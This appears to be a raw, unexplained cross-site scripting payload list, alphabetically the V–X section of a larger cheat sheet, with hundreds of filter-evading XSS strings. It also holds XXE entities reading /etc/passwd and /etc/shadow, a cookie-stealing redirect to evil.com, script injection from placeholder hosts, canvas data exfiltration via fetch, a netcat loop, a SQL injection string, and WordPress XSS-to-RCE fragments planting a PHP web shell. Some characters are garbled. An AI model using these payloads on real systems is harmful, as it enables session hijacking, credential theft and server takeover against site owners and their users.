<url>javascript:alert(document.domain)</url>
[url=javascript:alert(‘XSS’);]click me[/url]
‘/(\/\*.*\*\/)/Us’,
uscriptualert(EXSSE)u/scriptu
?userDefined=’);function someFunction(a){}alert(1)//”,
utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
UTF-7: +ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-
utf-8&v=XSS
+/v8-+ADw-script+AD4-alert(28)+ADw-/script+AD4-
<! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
<! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:alert(‘XSS’);”>
<! — <value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=”javas<![CDATA[cript:confirm(document.location);”>
“”+{valueOf:alert}
valueOf=alert;
-{valueOf(){alert`:D`}}
valueOf=alert;this+1;
-{valueOf:location,toString:[].pop,0:javascript:alert%281%29.source,length:1}
values=”;javascript:alert(1)” begin=”0s” dur=”0.1s” fill=”freeze”/>
var a=0; ((a == 1) ? 2 : confirm(1));//
var a = ��foo��/alert(9)//��;
var a = ��foo��&&alert(9)//��;
var a = ��foo��+alert(9)//��;
var a= <%=str_a%>
“){};var b=’al’+’ert()’;eval(b);if(shit=”
var buttons =$(“[data-role=button]”);
var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.documentElement.innerHTML = data;
var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.head.outerHTML = data;
var data = “jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”;document.write(data);document.close();
variable[<script>]=*alert(1)</script>
var m=’alert(0)’;var o=’’;for(var i=0;i<m.length;i++) {o+=’\\’+(m[i].charCodeAt().toString(8));}[][‘\143\157\156\163\164\162\165\143\164\157\162’][‘\143\157\156\163\164\162\165\143\164\157\162’](‘\141\154\145\162\164\50\60\51’)();[][‘constructor’][‘constructor’]
var n = {a: “-alert(1)}//\”, b: “-alert(1)}//\”};
var n = {a: “\”, b: “-alert(1)}//”};
var n = {a: “$p”, b: “$p”};
var n = {a: “$p”, b: “$q”};
<var onmouseover=”prompt(1)”>KCF</var>
<var onmouseover=”prompt(1)”>On Mouse Over</var>?
<var onmouseover=”prompt(1)”>On Mouse Over</var>
<var onmouseover=”prompt(1)”>renwax23</var>
var q:String=loaderInfo.parameters[“q”].split(“\\”).join(“\\\\”);
var re = /jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e/;
var rewrittenBindings =ko.expressionRewriting.preProcessBindings(bindingsString, options),
var str = ‘jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e’;
var str = “jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”;
“var x=new XMLHttpRequest();x.open(‘GET’,’//0');x.send();
var{x:x,x=alert(1)}=1;
var{x:y,}=1
vbscript & # 00058; alert (1);
vbscript&#00058;confirm(1);
vbscript&#058;alert(1);
vbscript: alert (1);
vbscript:alert(1);
vbscript:alert(1); vbscript&#058;alert(1); vbscr&Tab;ipt:alert(1)”
vbscript:confirm(1);
vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
vbscript:Msgbox+1
vbscript:prompt(1)#{“action”:1}
vbscr & Tab; ipt: alert (1) “
vbscr&Tab;ipt:alert(1)”
vbscr&Tab;ipt:confirm(1)”
v=d.createElement(‘video’);
v=d.createElement(video);
veris →group<svg/onload=alert(/XSS/)//
<videogt;<source onerror=javascript:prompt(911)gt;
<video id=XSS poster=javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))//
video-js.swf?readyFunction=alert(1)
video-js.swf?readyFunction=alert%28document.domain%2b’%20XSSed!’%29
<video onclick=popup=1;>
<video onerror=alert(1337) </poster>
<VideO/**/OnerroR=~alert(“1”)+/SrC>
<video onerror=”javascript:alert(1)”><source>//INJECTX
<video onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”><source>
<video onerror=”javascript:javascript:alert(1)”><source>
<video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
<video+onerror=’javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};document.getElementById(%22safe123%22).click(test);’><source>%23
<video onloadstart=alert(102)><source>
<video onloadstart=alert(1)><source>
<VidEo/oNLoaDStaRt=confirm(1)+/src>
<video poster=javascript:alert(1)//></video>
<video poster=javascript:javascript:alert(1)//
<video/poster/onerror=alert()>
<video/poster/onerror=alert(1)>
<video/poster/onerror=prompt(1)>
<video><source onerror=”alert(1)”>
<video><source onerror=”javascript:alert(1)”>
<video><source onerror=”javascript:alert(1)”>//INJECTX
<Video> <source onerror = “javascript: alert (XSS)”>
<video><source onerror=”javascript:eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))”>
<video><source onerror=”javascript:javascript:alert(1)”>
<video><source o?UTF-8?Q?n?error=”confirm(1)”>
<video src=1 href=1 onerror=”javascript:alert(1)”></video>
<video src=1 onerror=alert(1)>
<video src=”http://www.w3schools.com/html5/movie.ogg" onloadedmetadata=”alert(1)” />
<video src=”http://www.w3schools.com/html5/movie.ogg" onloadstart=”alert(1)” />
<video/src/id=”onerror”onloadstart=top[id]=confirm;throw”32">
<video src=. onerror=prompt(0)>
“<video src=. onerror=prompt(0)>”
<video src=_ onloadstart=”alert(1)”>
<video src onratechange=”alert(1)”>
<video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(1))>
<video src=x onerror=alert(48)>
<video src=x onerror=prompt(1);>
<video src=x onerror=prompt(1);>
<video src=”x” onloadstart=”alert(1)”>
<video src=”x” onloadstart=”confirm(1)”>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
vml.xml:<xml><rect style=”height:100%;width:100%” id=”xss” onmouseover=”alert(1)” strokecolor=”white” strokeweight=”2000px” filled=”false”/></xml>
v.src=URL.createObjectURL(s);v.play()},function(){});
vulnerable”%3B%20alert(%27Mondays%27)%3B%20"
([,?,,,,?]=””+{},[??,??,??,??,,???,???,???,,,???]=[!!?]+!?+?.?)[?+=?+???+???+??+??+??+?+??+?+??][?](???+???+??+??+??+”(-~?)”)() // (V_V)
<w contenteditable id=x onfocus=alert()>
Wdpbi1lZGl0b3IucGhwPycNCmY9J2ZpbGU9YWtpc21ldC9pbmRleC5w
$ while :; do printf “j$ “; read c; echo $c | nc -lp PORT >/dev/null; done
width: expression((window.r==document.cookie)?’’:alert(r=document.cookie))
(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
window[“ale” + (!![]+[])[+!+[]]+(!![]+[])[+[]]](1)
window.alert(1)
window[“alert”](1)
(window[��alert��])(9)
window[��alert��](9)
window.alert(“Bonjour !”);
window.alert(“Bonjour !”);
window[/alert/.source](9)
window.location.assign(“http://xss.cx")
window.location.replace(“http://stackoverflow.com");
window.name
window.name=’a\x01b’
window.name=’hacked’;location.replace(‘about:blank’);
window.name=”javascript:confirm((window.opener||window).document.cookie);”;
window.open(‘http://target.com/?search=<svg/onload=window[localStorage.xss]=window.name//','javascript:alert(1)');
window.open(“http://xss.cx","confirm(document.domain);", “”, false);
window[Symbol.hasInstance]=eval
win.location.href = “https://www.whatismyreferer.com";
win = window.open(“https://www.paypal.com");
with(document)alert(cookie)
#with(document)body.appendChild(createElement
with(document)body.appendChild(createElement(‘iframe onload=&#97&#108&#101&#114&#116(1)>’),body.innerHTML+=”(IE)
#with(document)body.appendChild(createElement(/script/.source)).src=atob(/Ly9icnV0ZWxvZ2ljLmNvbS5ici8y/.source)
with(document)body.appendChild(createElement(‘script’)).src=’//DOMAIN’
with(document)getElementsByTagName(‘head’)[0].appendChild(createElement(‘script’)).src=’//?.ws’
with(document.__parent__)alert(1)
with(location)with(hash)eval(substring(1))
with(top)body.appendChild (createElement(‘script’)).src=’//0'
\”};with(window){onload=function(){ with(document){k=cookie;};with(window){location=’http://evil.com/?a=test'%2bk;};}}//;
with(x)for(i=d=c.width=200;j=i — /d;fillStyle=R(d+i,d/j,arc(99+(i-79)*S(T(t)),S(3*j+S(t*7)/4)*75,j>.9?5:30*S(3*j+.3),0,7),fill()))beginPath()
$=’_wpnonce=’+/ce” value=”([^”]*?)”/.exec(x.responseText)[1]+’&newcontent=<?=`$_GET[brute]`;&action=update&’+f
// wp_xss2rce.js 1/3
// wp_xss2rce.js 2/3
www.site.com/test.php?var=text;alert(1)//
www.site.com/test.php?var=textv;alert(1)//
<w=”/x=”y>”/ondblclick=`<`[confir\u006d``]>z
wZScsJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpD
x=”<%”;
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
&#x000003c;
&#x000003c
&#x000003C;
&#x000003C
&#X000003c;
&#X000003c
&#X000003C;
&#X000003C
&#x000003e;
&#x000003e
&#x000003E;
&#x000003E
&#X000003e;
&#X000003e
&#X000003E;
&#X000003E
&#x00003c;
&#x00003c
&#x00003C;
&#x00003C
&#X00003c;
&#X00003c
&#X00003C;
&#X00003C
&#x00003e;
&#x00003e
&#x00003E;
&#x00003E
&#X00003e;
&#X00003e
&#X00003E;
&#X00003E
&#x0003c;
&#x0003c
&#x0003C;
&#x0003C
&#X0003c;
&#X0003c
&#X0003C;
&#X0003C
&#x0003e;
&#x0003e
&#x0003E;
&#x0003E
&#X0003e;
&#X0003e
&#X0003E;
&#X0003E
&#x003c;
&#x003c
&#x003C;
&#x003C
&#X003c;
&#X003c
&#X003C;
&#X003C
&#x003c;img src=1 onerror=confirm(1)&#x003e;
&#x003e;
&#x003e
&#x003E;
&#x003E
&#X003e;
&#X003e
&#X003E;
&#X003E
<\x00img src=’1' onerror=alert(0) />
→<! — — \x00> <img src=xxx:x onerror=javascript:alert(1)> →
“‘`><\x00img src=xxx:x onerror=javascript:alert(1)>
‘`”><\x00script>javascript:alert(1)</script>
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
&#x03c;
&#x03c
&#x03C;
&#x03C
&#X03c;
&#X03c
&#X03C;
&#X03C
&#x03e;
&#x03e
&#x03E;
&#x03E
&#X03e;
&#X03e
&#X03E;
&#X03E
<x%09onxxx=1
<x%09onxxx=1
<x%09onxxx=142
<x~%0Aonfocus=alert(26) id=a tabindex=0>
<x%0Aonxxx=1
<x%0Aonxxx=1
<x%0Aonxxx=143
[\x0B]onmosemove=confirm(‘\Done\’)>
<x%0Conxxx=1
<x%0Conxxx=1
<x%0Conxxx=144
<x%0Donxxx=1
<x%0Donxxx=1
<x%0Donxxx=145
(X,)=>1
/x:1/:///%01javascript:alert(document.cookie)/
<x 1=’1'onxxx=1
<x 1=’1'onxxx=1
<x 1=”1"onxxx=1
<x 1=’1'onxxx=147
<x 1=”1"onxxx=148
<x 1=”>” onxxx=1
<x 1=”>” onxxx=1
<x 1=”>” onxxx=150
→<! — — \x21> <img src=xxx:x onerror=javascript:alert(1)> →
x%22%3E%3Cimg%20src=%22x%22%3E%3C! — %2522%2527 — %253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
\x27-confirm`1`-\x27
<x%2F1=”>%22OnXxx%3D1
<x%2Fonxxx=1
<x%2Fonxxx=1
<x%2Fonxxx=146
\x3c
&#x3c;
&#x3c
\x3C
&#x3C;
&#x3C
&#X3c;
&#X3c
&#X3C;
&#X3C
“‘`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
\x3cimg\u0020src=1\u0020onerror=alert(1)\x3e
\x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e
‘`”><\x3Cscript>javascript:alert(1)</script>
‘`”><\x3Cscript>javascript:alert(1)</script>
\x3Cscript>javascript:alert(1)</script>
\x3csVg/<sVg/oNloAd=alert()//>\x3e
&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
\x3e
&#x3e;
&#x3e
\x3E
&#x3E;
&#x3E
&#X3e;
&#X3e
&#X3E;
&#X3E
<! — \x3E<img src=xxx:x onerror=javascript:alert(1)> →
→<! — — \x3E> <img src=xxx:x onerror=javascript:alert(1)> →
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
&#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
<x %6Fnerror=confirm(133)
<x %6Fnxxx=1
<x %6Fnxxx=1
&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;
&#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;
“>/XaDoS/><script>alert(document.cookie)</script>
“>/XaDoS/><script>alert(document.cookie)</script><script src=”http://www.site.com/XSS.js"></script>
x”);$=alert, $(1);//
!{x(){alert(1)}}.x()
xa?</title><img src%3dx onerror%3dconfirm(1)>
[\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
x=’c2.drawImage(v,0,0,640,480);fetch(“//HOST/”+c2.canvas.toDataURL())’;
x=c2.drawImage(v,0,0,640,480);fetch(//HOST/+c2.canvas.toDataURL());
[][x=’constructor’][x](‘alert(1)’)()
<x contenteditable onblur=alert(108)>lose focus!
<x contenteditable onblur=alert(1)>lose focus!
<x contenteditable onblur=alert(1)>lose focus!
<x contenteditable onfocus=alert(115)>focus this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(116)>input here!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(117)>press any key!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(118)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(119)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x contenteditable onpaste=alert(125)>paste here!
<x contenteditable onpaste=alert(1)>paste here!
<x contextmenu=”>”><a/value=”aaaaaaaaa”/onmousemove=%0Dprompt(196)%0A>#x
<x data-bind=”.:confirm(1)”>
<x data-bind=”.:&#x5cu0061lert(1)”>
x=’ev’+’al’
x=eval
��x:expr/**/ession(alert(1))��
x:expr/**/ession(alert(1))
x.fillText(“ASCII”,C=0,40)
x.fillText(“Xo= “[C],t*54,Y*22)
x.fillText(“Xw=^ “[C],t*54,Y*22)
x.font=”3em’”
x.font=”3em A”
<x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’>
<x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(1)//’>
xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())
x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())=>class x extends x{}()()();x()
<xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
<XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas]]<![CDATA[cript:alert(‘XSS’);”>]]</C><X></xml>
<xml ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=”;javas]]>;<;![CDATA[cript:alert(‘;XSS’;);”;>;]]>;
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]>
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]> </C></X></xml><SPAN DATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:javascript:alert(1);”>]]</C><X></xml>
<XML ID=I><X><C><![<IMG SRC=”javas]]<![cript:document.vulnerable=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<xml id=”X”><a><b><script>alert(‘XSS’);</script>;<b></a></xml>
<xml id=”X”><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
<XML ID=”XSS”><I><B><IMG id=XSS SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATAid=XSS SRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(XSS^
<;XML ID=”;xss”;>;<;I>;<;B>;<;IMG SRC=”;javas<;! — →;cript:alert(‘;XSS’;)”;>;<;/B>;<;/I>;<;/XML>;
<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
<XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:document.vulnerable=true”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></span>
<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! —
<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:alert(‘XSS’)”&gt;</B></I></XML>
<xml ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:alert(‘XSS’)”&gt;</B></I></xml><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml id=”xss” src=”%(htc)s”></xml> <label dataformatas=”html” datasrc=”#xss” datafld=”payload”></label>
<XML id=XSS SRC=”http://xxxx.com/xsstest.xml" ID=I></XML>
<XML id=XSS SRC=”xsstest.xml” ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
<xml:namespace prefix=t><import namespace=t implementation=…..
<?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
xmlns:x=”http://w3.org/1999/xhtml “>alert(1&#00000041;
<xml onPropertyChange xml onPropertyChange=”javascript:javascript:alert(1)”></xml onPropertyChange>
<;XML SRC=”;http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
<XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML>
<XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML src=”javascript:alert(‘X11SS’);”>
<XML SRC=”javascript:alert(‘XSS’);”>
<XML SRC=”javascript:alert(“XSS”)
<xml src=”javascript:document.vulnerable=true;”>
<XML SRC=”xsstest.xml” ID=I></XML>
<XML SRC=”xsstest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML SRC=”xsstest.xml” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml-stylesheet href=”javascript:alert(1)”?><root/>
<?xml-stylesheet type=”text/css”?><!DOCTYPE x SYSTEM “test.dtd”><x>&x;</x>
<?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
<?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
<?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/> // Works in IE7 ? http://html5sec.org/#77
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file://c:/boot.ini”>]><foo>&xee;</foo>
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///dev/random”>]><foo>&xee;</foo>
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/passwd”>]><foo>&xee;</foo>
<?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/shadow”>]><foo>&xee;</foo>
<?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[‘ or 1=1 or ‘’=’]]></foof>
<?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘gotcha’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version=”1.0" encoding=”utf-8" ?><x:script
<?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'>
<?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
<?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script></html>
<?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(8)</script></html>
<?xml version=”1.0"?><script xmlns=”http://www.w3.org/1999/xhtml">alert(9)</script>
<?xml version=”1.0" ?><someElement><a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
<?xml version=”1.0" ?><someElement> <a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
<?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)”
<?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)” xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
<?xml version=”1.0"?><x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(27&#x29;</x:script>
<xmp><img alt=”</xmp><img src=xx:x onerror=alert(1)//”>
<xmp><img alt=”</xmp><img src=xx:x onerror=confirm(1)//”>
<xmp><%</xmp><img alt=’%></xmp><img src=xx:x onerror=alert(1)//’>
x=new class extends Function{}(‘alert(1)’);
x=new class extends Function{}(‘alert(1)’);x=new x;
x=new x;
x=new XMLHttpRequest()
x = new XMLHttpRequest();
<x o%6Eerror=prompt(134)
<x o%6Exxx=1
<x o%6Exxx=1
<x on%78error=confirm(135)
<x on%78xx=1
<x on%78xx=1
<x onafterscriptexecute=alert(127)>
<x onbeforescriptexecute=alert(128)>
<x onclick=alert(109)>click this!
<x onclick=alert(1)>click this!
<x onclick=alert(1)>click this!
<x oncontextmenu=alert(111)>right click this!
<x oncontextmenu=alert(1)>right click this!
<x oncontextmenu=alert(1)>right click this!
<x oncopy=alert(110)>copy this!
<x oncopy=alert(1)>copy this!
<x oncopy=alert(1)>copy this!
<x oncut=alert(112)>copy this!
<x oncut=alert(1)>copy this!
<x oncut=alert(1)>copy this!
<x+oncut=y=prompt,y`1`>renwax23
<x oncut=y=prompt,y``>z
<x ondblclick=alert(113)>double click this!
<x ondblclick=alert(1)>double click this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(114)>drag this!
<x ondrag=alert(1)>drag this!
<x ondrag=alert(1)>drag this!
<x onerror%3Dprompt(136)
<x onload’=confirm(1)
<x onmousedown=alert(120)>click this!
<x onmousedown=alert(1)>click this!
<x onmousedown=alert(1)>click this!
<x onmouseenter=alert(126)>hover me!
<x onmousemove=alert(121)>hover this!
<x onmousemove=alert(1)>hover this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(122)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>
<x onmouseover=alert(123)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(124)>click this!
<x onmouseup=alert(1)>click this!
<x onmouseup=alert(1)>click this!
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}”
<x onwebkitanimationend=alert(74)><style>X{animation:S}@keyframes S{}
<x </onxxx=1
<x </onxxx=1
<x/onxxx=1
<x/onxxx=1
<x OnXxx=1
<x OnXxx=1
<X onxxx=1
<X onxxx=1
<X OnXxx=1
<X OnXxx=1
<X onxxx=137
<x OnXxx=138
<X OnXxx=139
<x onxxx=140 onxxx=1400
<x/onxxx=141
<x </onxxx=149
<x onxxx=1 onxxx=1
<x onxxx%3D1
<x onxxx=alert(1) 1=’
<x onxxx=alert(152) 152=’
x.open(‘GET’,p+f,0)
x.open(POST, home.php, true);
?x=<script%20src=data:&x=alert(1);>
“><<x>script>confirm(2)<<x>/<x>script>
x’\”></script><img src=x onerror=alert(1)>
<x:script xmlns:x=”https://sql--injection.blogspot.co.uk">alert('xss');</x:script>
<x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(1);</x:script>
<x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert('xss');</x:script>
x.send()
x.send(post=</textarea><br><a href= + document.URL + >Check this!</a>);
x.setRequestHeader(Content-type, application/x-www-form-urlencoded);
x setter=eval,x=1
;! — “<XSS>=&{()}”
// XSS //
‘;’;;! — “;<;XSS>;=&;{()}
‘’;! — “<XSS>=&{()}
xss:&#101;x&#x2F;*XSS*//*/* ?/pression(alert(“XSS”))’>
xss:&#101;x&#x2F;*XSS*//**pression(alert(“XSS”))’>
/?xss=500); alert(document.cookie);//
xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\”XSS\”))’&gt;
